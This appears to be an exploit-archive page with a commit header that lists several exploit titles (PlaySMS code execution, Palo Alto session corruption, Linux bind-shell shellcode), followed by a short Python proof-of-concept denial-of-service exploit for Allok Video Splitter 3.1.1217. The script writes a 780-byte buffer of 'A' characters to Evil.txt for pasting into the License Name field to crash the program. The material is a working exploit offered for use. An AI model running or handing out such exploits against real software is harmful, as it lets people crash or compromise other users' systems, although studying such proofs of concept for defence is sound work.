017887466c
4 changes to exploits/shellcodes Allok Video Splitter 3.1.12.17 - Denial of Service GNU wget - Cookie Injection FxCop 10/12 - XML External Entity Injection Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit) PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit) PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit) Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit) PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit) PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit) Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)
23 lines
No EOL
817 B
Python
Executable file
23 lines
No EOL
817 B
Python
Executable file
###########################################################################################
|
|
# Exploit Title: Allok Video Splitter 3.1.1217
|
|
# Date: 2018-05-09
|
|
# Exploit Author: Achilles
|
|
# Vendor Homepage: http://www.alloksoft.com/
|
|
# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
|
|
# Tested on OS: Windows 7 64-bit DE
|
|
# Steps to reproduce: Copy the contents of the file (Evil.txt)
|
|
# and paste in the License Name field click Register and BOOM
|
|
###########################################################################################
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "A" * 780
|
|
|
|
try:
|
|
f=open("Evil.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
|
f.write(buffer)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |